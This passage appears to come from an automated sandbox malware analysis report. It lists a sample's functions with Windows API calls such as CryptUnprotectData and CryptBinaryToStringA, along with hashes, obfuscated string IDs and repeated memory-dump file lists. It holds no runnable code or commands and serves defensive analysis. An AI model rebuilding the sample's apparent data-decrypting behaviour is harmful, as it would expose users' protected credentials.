                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 83be01ea49187628f745939c1f30efb19c80129455c3afe7ee0616e92a32378f
                            • Instruction ID: 1d4a18adeb7e19638e5d5fed8b55d55a776b5e0057b80c22ec938de8f2bf1b6c
                            • Opcode Fuzzy Hash: 83be01ea49187628f745939c1f30efb19c80129455c3afe7ee0616e92a32378f
                            • Instruction Fuzzy Hash: 8131E476A00218ABDB10CB58EC45FEFB77EDB44705F00416AFD09E3281DBB55A088BA5
                            Function 004540B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004540CD
                            • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004540DC
                            • RtlAllocateHeap.NTDLL(00000000), ref: 004540E3
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00454113
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptHeapString$AllocateProcess
                            • String ID:
                            • API String ID: 3825993179-0
                            • Opcode ID: 359bed91a60ab89599370cb552ef05a7f68d65992286bca3d297e82372d112a4
                            • Instruction ID: 8ce03ef81b919c84fab92d492ddedfd5dc67fa59a586db7ee23fbb7076cb63ea
                            • Opcode Fuzzy Hash: 359bed91a60ab89599370cb552ef05a7f68d65992286bca3d297e82372d112a4
                            • Instruction Fuzzy Hash: 52011E70600205BBDB109FA5EC45B6BBBAEEF85715F108159FD0987340DA719940CB64
                            Function 00452B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0045A3D0,000000FF), ref: 00452B8F
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00452B96
                            • GetLocalTime.KERNEL32(?,?,00000000,0045A3D0,000000FF), ref: 00452BA2
                            • wsprintfA.USER32 ref: 00452BCE
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 3b9c849755658afb15288238948e2c792278ecdc303b80a29047a3f7a67fcd34
                            • Instruction ID: 009b9f58223028839c640a558307fb0b5b08a10623ce40a3df0cc17ce0945859
                            • Opcode Fuzzy Hash: 3b9c849755658afb15288238948e2c792278ecdc303b80a29047a3f7a67fcd34
                            • Instruction Fuzzy Hash: 600140B2904128ABCB149BD9DD45FBEB7BDFB4CB11F00021AFA05A2290E7B85840C7B5
                            Function 00439B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00439B3B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00439B4A
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00439B61
                            • LocalFree.KERNEL32 ref: 00439B70
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID:
                            • API String ID: 4291131564-0
                            • Opcode ID: e78c0b603b84c466e8be6472cfcf917b98e48be133f153c459ecfa9772685a37
                            • Instruction ID: 5bc86214ec94dd7df9abe04dfbed7feea50c61fac461a8b66c4b3ff024032c1a
                            • Opcode Fuzzy Hash: e78c0b603b84c466e8be6472cfcf917b98e48be133f153c459ecfa9772685a37
                            • Instruction Fuzzy Hash: ECF0F9702443126BE7301B65AC49F57BBADAF09B50F201115FE45EA2D0D7F49C40CAA4
                            Function 007F9B73 Relevance: 5.3, Strings: 3, Instructions: 1565COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: !pK$/4~J$Jum{
                            • API String ID: 0-3477825694
                            • Opcode ID: be37e189e37236cff981cb2c3bc46f2216d9bbd10d34273ce41ae8c32c92293e
                            • Instruction ID: 06f44584e22fd6a616b627d0f81bd138f887d9cb768a8f565220a6afffe09c2d
                            • Opcode Fuzzy Hash: be37e189e37236cff981cb2c3bc46f2216d9bbd10d34273ce41ae8c32c92293e
                            • Instruction Fuzzy Hash: EFB2E4F2A0C2049FE708AF29EC8567ABBE5EF94720F16493DEAC5C7744E63558408787
                            Function 0044CAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.COMBASE(0045B110,00000000,00000001,0045B100,?), ref: 0044CB06
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0044CB46
                            • lstrcpyn.KERNEL32(?,?,00000104), ref: 0044CBC9
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                            • String ID:
                            • API String ID: 1940255200-0
                            • Opcode ID: f1e208fb4f685b633275f1a0fc65707b19477e67f8043b01830a7f82712a59ae
                            • Instruction ID: b75ec98b9f67dc660066d074002a809375b47267d4ff74880160ead17a90e926
                            • Opcode Fuzzy Hash: f1e208fb4f685b633275f1a0fc65707b19477e67f8043b01830a7f82712a59ae
                            • Instruction Fuzzy Hash: 98317871A40614BFD750DB94CC82F99B7B9DB88B10F104185FA14EB2D0D7B4AD44CB90
                            Function 00439B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00439B9F
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00439BB3
                            • LocalFree.KERNEL32(?), ref: 00439BD7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 0626ee5093f020a6cbaf2e05218f88fff5c9d0c6114e77c1d8f6b65ca5eead5f
                            • Instruction ID: 23494072be9fee958a67e36a70f54ec40641ae8a4ff0a1b21ffa78873d515ac5
                            • Opcode Fuzzy Hash: 0626ee5093f020a6cbaf2e05218f88fff5c9d0c6114e77c1d8f6b65ca5eead5f
                            • Instruction Fuzzy Hash: DC01CD75A41319ABE7109FA4DC45FAFB77DEB48B00F104555EE04AB380D7B5AE008BE5
                            Function 007FD9AC Relevance: 4.5, Strings: 3, Instructions: 710COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: &@sy$[%Xi$aUY
                            • API String ID: 0-756594915
                            • Opcode ID: b82af6edf5c20ed4cb639979fbfee1b32bbbf12d24244deec9362aaf3db59737
                            • Instruction ID: 7486272fd115ccb20a1783e5c82fa942bf99d14bdf007a67267b63fff41a759a
                            • Opcode Fuzzy Hash: b82af6edf5c20ed4cb639979fbfee1b32bbbf12d24244deec9362aaf3db59737
                            • Instruction Fuzzy Hash: 7322E6F3A082109FE314AE2DEC85B7AB7E5EF94720F1A453DEAC4D3744EA3558058692
                            Function 00800428 Relevance: 2.8, Strings: 1, Instructions: 1553COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Wjw{
                            • API String ID: 0-2507661684
                            • Opcode ID: 1dbb604e7de1c0b5e79c64f2b37441bb11810fb0b1705e0c2c5603b9a80e2fe7
                            • Instruction ID: 7318c0a51b8ed07a229903ebf8bd4a06bde80262fd63104a8d46eca1851103e3
                            • Opcode Fuzzy Hash: 1dbb604e7de1c0b5e79c64f2b37441bb11810fb0b1705e0c2c5603b9a80e2fe7
                            • Instruction Fuzzy Hash: FCB2E5F360C2049FE304AE2DEC8567ABBE5EF94320F16493DEAC587744EA3558058B97
                            Function 007CA78C Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: i@wh
                            • API String ID: 0-887614478
                            • Opcode ID: 5d692a0ed414e9479637c545554461b18340469c0a8dc1fc405da5db7b33715f
                            • Instruction ID: 57c6defc5e79b6d00efd2081db5f6c67f8dce923beb3d7c60c745bb5f16b617a
                            • Opcode Fuzzy Hash: 5d692a0ed414e9479637c545554461b18340469c0a8dc1fc405da5db7b33715f
                            • Instruction Fuzzy Hash: FF615DF3E182105FE7059D2EDC847BBB7DADBD4320F2A853DEAC993784E93558058292
                            Function 006C2599 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: {\_
                            • API String ID: 0-535716125
                            • Opcode ID: 3c8769fb99a9d54582a55a6e8b3ba83169306fc00e9bd8b18a2fa6eacf76fdd5
                            • Instruction ID: b96f7b5af3de159f2180b4f7551045fcc48154dcc7ff999646ac6cc54af2cbd9
                            • Opcode Fuzzy Hash: 3c8769fb99a9d54582a55a6e8b3ba83169306fc00e9bd8b18a2fa6eacf76fdd5
                            • Instruction Fuzzy Hash: 2D5134F7A087189FE3087A2AEC457BAB7E9DB90320F0B853DDAC483740ED75180586C6
                            Function 0075EE38 Relevance: .2, Instructions: 196COMMON
                            Download Yara Rule
                            Memory Dump Source
